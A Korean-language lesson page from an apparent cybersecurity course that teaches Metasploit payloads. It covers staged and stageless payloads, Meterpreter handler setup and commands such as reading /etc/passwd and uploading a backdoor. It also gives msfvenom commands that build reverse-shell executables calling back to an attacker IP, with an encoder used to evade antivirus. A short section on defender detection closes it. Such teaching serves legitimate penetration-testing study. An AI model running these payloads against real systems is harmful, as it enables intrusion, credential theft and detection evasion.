페이로드: 스테이징과 비스테이징, Meterpreter
상황에 맞는 페이로드를 선택하고 사후 익스플로잇에 Meterpreter를 사용합니다.
페이로드: 스테이징과 비스테이징, Meterpreter은(는) CoddyKit의 무료 Cyber Security Academy 강의입니다. 이것은 4개 중 3번째 강의입니다. 아래에서 전체 강의를 무료로 읽을 수 있으며, 내장 코드 에디터와 24/7 AI 튜터와 함께 브라우저에서 직접 실습할 수 있습니다. 이 강의는 Cyber Security Academy 학습 경로의 일부이며, 진행 상황이 웹과 CoddyKit 앱에 동기화됩니다. Cyber Security Academy 강의에는 총 4개의 강의가 포함되어 있습니다.
페이로드란 무엇입니까?
페이로드는 익스플로잇이 성공한 후 대상에서 실행되는 코드입니다. 공격자가 얻는 것을 정의하며, 셸, 명령 실행, 파일 접근 또는 Meterpreter와 같은 모든 기능을 갖춘 에이전트가 될 수 있습니다.
스테이지드 페이로드와 스테이지리스 페이로드
스테이지리스 페이로드(/)는 모든 내용을 하나의 바이너리에 포함합니다. 크기는 더 크지만 구조가 단순하며, 초기 전달 후 네트워크 콜백이 필요하지 않습니다. 스테이지드 페이로드(//)는 먼저 작은 스테이저를 보내고, 스테이저가 핸들러에서 두 번째 스테이지를 다운로드합니다.
# Stageless (single slash naming):
windows/x64/shell_reverse_tcp
# Staged (double slash naming):
windows/x64/shell/reverse_tcp
# ^
# stage 2 downloaded after stager connects각 방식을 사용하는 경우
초기 익스플로잇 후 대상이 인터넷이나 핸들러에 접근할 수 없다면 스테이지리스를 사용하십시오. 페이로드가 자체적으로 완결되어야 합니다. 더 작은 초기 페이로드를 원하고 핸들러 연결이 안정적이라면 스테이지드를 사용하십시오.
Meterpreter 개요
Meterpreter는 Metasploit의 고급 페이로드입니다. 메모리에서만 실행되고 통신이 암호화되며, 파일 시스템 접근, 프로세스 마이그레이션, 키 입력 기록, 스크린샷 캡처 및 피벗을 제공하는 풍부한 API를 갖추고 있습니다.
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.10
msf6 > set LPORT 4444
msf6 > runMeterpreter 명령
익스플로잇 후 작업에 사용하는 필수 Meterpreter 명령에는 시스템 정보, 프로세스 목록, 파일 작업 및 네트워킹이 있습니다.
meterpreter > sysinfo # system information
meterpreter > getuid # current user
meterpreter > ps # process list
meterpreter > download /etc/passwd
meterpreter > upload backdoor.sh /tmp/
meterpreter > shell # drop to OS shell프로세스 마이그레이션
Meterpreter 프로세스를 더 안정적이거나 덜 의심스러운 프로세스로 마이그레이션합니다(예: Windows의 explorer.exe). 더 높은 권한을 가진 프로세스로 마이그레이션하면 권한이 상승할 수도 있습니다.
meterpreter > ps
meterpreter > migrate 1234 # migrate to PID 1234
# Migrate to explorer.exe for stability
# Avoids termination if original process exitsmsfvenom으로 페이로드 생성
msfvenom은 승인된 테스트에서 피싱, USB 투입 또는 웹 셸을 통해 전달할 독립 실행형 페이로드 파일(EXE, ELF, APK, 셸코드)을 생성합니다.
# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-f exe -o payload.exe
# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-f elf -o payload.elf셸 수신을 위한 multi/handler
multi/handler 보조 모듈은 역방향 셸 연결을 수신합니다. 페이로드를 전달하기 전에 msfvenom에서 사용한 것과 동일한 페이로드, LHOST 및 LPORT로 구성하십시오.
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 0.0.0.0
msf6 > set LPORT 4444
msf6 > run -j # run as background job인코딩 및 회피 기초
msfvenom 인코더는 페이로드를 난독화하여 시그니처 기반 AV 탐지를 회피할 수 있습니다. 주의하십시오. 최신 EDR은 행동 기반 탐지를 사용하므로 인코더만으로는 고급 방어를 우회하기에 충분하지 않습니다.
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-e x64/xor_dynamic -i 5 \
-f exe -o encoded_payload.exe리버스 페이로드와 바인드 페이로드
리버스 페이로드는 대상에서 공격자로 연결되므로 NAT 및 방화벽 환경에 더 적합합니다. 바인드 페이로드는 대상에서 수신 대기하고 공격자가 연결합니다. 대부분의 상황에서는 리버스 방식이 선호됩니다.
방어자의 페이로드 탐지
방어자는 다음과 같은 방법으로 Meterpreter를 탐지합니다. 네트워크 시그니처(명령 및 제어 트래픽 패턴), 메모리 검색(리플렉티브 DLL 주입 흔적), 행동 분석(프로세스 할로잉, 비정상적인 부모-자식 관계)입니다.
빠른 확인
Metasploit에서 스테이지드 페이로드와 스테이지리스 페이로드를 구분하는 특징은 무엇입니까?
요약: 페이로드와 Meterpreter
초기 흔적을 작게 유지하려면 스테이지드 페이로드를, 자체적으로 완결된 전달이 필요하면 스테이지리스 페이로드를 선택합니다. Meterpreter는 익스플로잇 후 작업에 가장 강력한 페이로드입니다. 메모리에서 실행되고 암호화되며 확장할 수 있습니다. 독립 실행형 바이너리를 생성할 때는 msfvenom을 사용하고, 콜백을 수신하도록 항상 multi/handler를 구성하십시오.
AI 튜터와 함께 Cyber Security Academy을(를) 배우세요 — 무료
브라우저에서 실제 코드를 작성하고 실행하며, 24/7 AI 튜터로부터 즉각적인 도움을 받고, 웹이나 앱에서 중단한 부분부터 계속 학습하세요.
- 코스
- 76
- 레슨
- 303
자주 묻는 질문
“페이로드: 스테이징과 비스테이징, Meterpreter” 강의는 무료인가요?
네 — “페이로드: 스테이징과 비스테이징, Meterpreter” 전체 내용을 이 웹사이트에서 무료로 읽을 수 있습니다. 인터랙티브하게 실습하려면(내장 코드 에디터와 24/7 AI 튜터), CoddyKit PRO로 업그레이드하면 Cyber Security Academy 강의 전체를 잠금 해제할 수 있습니다. Cyber Security Academy 강의에는 총 4개의 강의가 포함되어 있습니다.
“페이로드: 스테이징과 비스테이징, Meterpreter”에서 뭘 배우나요?
상황에 맞는 페이로드를 선택하고 사후 익스플로잇에 Meterpreter를 사용합니다. 브라우저에서 직접 실행하는 실습 코드로 Cyber Security Academy을(를) 배우며, 24/7 AI 튜터가 강의를 진행하면서 질문에 답변해줍니다.
Cyber Security Academy을(를) 시작하는 데 경험이 필요한가요?
사전 경험은 필요하지 않습니다. CoddyKit의 Cyber Security Academy은(는) 초급자부터 고급 학습자까지를 위해 구성되어 있으므로, 여기서 시작하거나 처음부터 시작할 수 있으며 자신의 속도대로 진행할 수 있습니다. 이것은 4개 중 3번째 강의입니다.
“페이로드: 스테이징과 비스테이징, Meterpreter” 강의는 얼마나 걸리나요?
대부분의 CoddyKit 강의는 약 5~10분이 소요됩니다. 각 강의는 간결하고 인터랙티브하여 꾸준한 진행이 가능하며, 웹과 앱에서 중단한 부분부터 바로 시작할 수 있습니다.
이 Cyber Security Academy 강의에서 코드를 작성하고 실행할 수 있나요?
네. 모든 Cyber Security Academy 강의에는 내장 코드 에디터가 포함되어 있으므로, 브라우저에서 바로 실제 코드를 작성하고 실행한 후 즉시 AI 피드백을 받을 수 있습니다 — 로컬 설정이 필요 없습니다.
이 강의의 모든 강의
- Metasploit 아키텍처와 msfconsole
- 알려진 취약점 악용
- 페이로드: 스테이징과 비스테이징, Meterpreter
- 사후 익스플로잇: 피벗과 지속성